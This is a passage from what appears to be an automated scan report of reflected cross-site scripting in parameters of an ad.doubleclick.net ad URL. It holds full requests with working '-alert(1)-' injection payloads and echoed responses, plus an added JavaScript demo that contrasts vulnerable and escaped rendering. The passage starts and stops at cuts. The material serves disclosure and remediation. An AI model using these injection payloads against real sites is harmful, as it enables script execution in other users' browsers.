Date: Wed, 27 Apr 2011 23:21:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_130384842
...[SNIP]...

3.120. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839f6"-alert(1)-"d40e86f6f52 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
66%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_13
...[SNIP]...

3.121. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2cf'-alert(1)-'434cc702ff0 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
66%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.122. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4884'-alert(1)-'1fd9fbb2e3b was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://
...[SNIP]...

3.123. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd276"-alert(1)-"9e7d663adcd was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.124. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a62"-alert(1)-"491575274f was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54538

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=35a62"-alert(1)-"491575274f&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;

...[SNIP]...

3.125. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97230'-alert(1)-'d278434a2 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54534

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=97230'-alert(1)-'d278434a2&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.126. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d51"-alert(1)-"68a22fe282e was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.
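The mechanism behind these findings, as an added example that is not code from the XSS.CX/Burp report or from DoubleClick: a value reflected into a quoted JavaScript string becomes code, and context-correct escaping turns it back into data. The template imitates the shape of the reflected line visible in the responses (this.<prop> = "<click URL>";); the property name clickUrl, the builder functions and the runAsAdScript harness are assumptions made for illustration. The two payloads are the ones from findings 3.126 and 3.127.

```javascript
// Added example, not code from the XSS.CX/Burp report or from DoubleClick:
// a value reflected into a quoted JavaScript string becomes code, and
// context-correct escaping stops it. The template imitates the reflected
// line visible in the report's responses (this.<prop> = "<click URL>";);
// the property name `clickUrl` and the harness below are assumptions.

// Payloads taken from findings 3.126 (double-quoted string) and 3.127
// (single-quoted string).
const PAYLOAD_DQ = '42d51"-alert(1)-"68a22fe282e';
const PAYLOAD_SQ = "86835'-alert(1)-'acccea5abcb";

// Vulnerable rendering: the parameter value is concatenated into the script
// verbatim, which is what the responses in the report show.
function buildVulnerable(value, quote) {
  return 'this.clickUrl = ' + quote + value + quote + ';';
}

// Escaping for the JavaScript-string context: every character outside a
// conservative allowlist becomes \xHH (or \uHHHH above U+00FF), so quotes,
// backslashes, angle brackets (which would otherwise allow a literal
// "</script>") and the U+2028/U+2029 line terminators all become inert data.
function jsStringEscape(s) {
  let out = '';
  for (const ch of s) {
    if (/^[A-Za-z0-9 ,._:\/&=?%-]$/.test(ch)) { out += ch; continue; }
    const cp = ch.codePointAt(0);
    if (cp < 0x100) out += '\\x' + cp.toString(16).padStart(2, '0');
    else if (cp < 0x10000) out += '\\u' + cp.toString(16).padStart(4, '0');
    else out += '\\u{' + cp.toString(16) + '}';
  }
  return out;
}

// Hardened rendering: same template, escaped value. The escaping does not
// depend on which quote character the template uses, which matters because
// the report shows the same parameters reflected into both kinds of string.
function buildHardened(value, quote) {
  return 'this.clickUrl = ' + quote + jsStringEscape(value) + quote + ';';
}

// Execute one generated statement the way the browser would execute the
// ad's inline script: `this` is the ad object and alert() is stubbed so the
// caller can tell whether injected code ran or the value stayed data.
function runAsAdScript(script) {
  const alerts = [];
  const adObject = {};
  new Function('alert', script).call(adObject, (v) => { alerts.push(v); });
  return { clickUrl: adObject.clickUrl, alerts };
}

// Side-by-side result for both payloads and both quoting styles.
function demonstrate() {
  const cases = [[PAYLOAD_DQ, '"'], [PAYLOAD_SQ, "'"]];
  return cases.map(([payload, quote]) => ({
    quote,
    vulnerable: runAsAdScript(buildVulnerable(payload, quote)),
    hardened: runAsAdScript(buildHardened(payload, quote)),
  }));
}

console.log(JSON.stringify(demonstrate(), null, 2));
```

Run it with node. In the vulnerable column the alerts array contains the 1 passed to alert(1) and clickUrl is NaN (string minus undefined minus string, the arithmetic the payload sets up to keep the statement valid); in the hardened column alerts is empty and clickUrl is exactly the submitted value. Escaping only the quote the template happens to use would leave the other template exposed, and HTML-entity encoding would change nothing here because entities are not decoded inside a script block.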

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 54533
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:15 GMT
Expires: Wed, 27 Apr 2011 23:22:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=42d51"-alert(1)-"68a22fe282e";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyImpUrl = "";
this
...[SNIP]...

3.127. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86835'-alert(1)-'acccea5abcb was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 54530
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:22:16 GMT
Expires: Wed, 27 Apr 2011 23:22:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=86835'-alert(1)-'acccea5abcbhttp://www.blackberry.com">
...[SNIP]...

3.128. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b1c7"-alert(1)-"3bd2dbe41e8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and hard to make safe. Where possible, the application should not place user data in this context at all. Where it must, every character outside a strict alphanumeric allowlist should be escaped as \xHH (or \uHHHH) before the value is written into the quoted JavaScript string. HTML entity encoding does not help inside a script block, and escaping only the quote character a given string uses is not enough, since this report shows the same parameters reflected into both single- and double-quoted strings.

Request

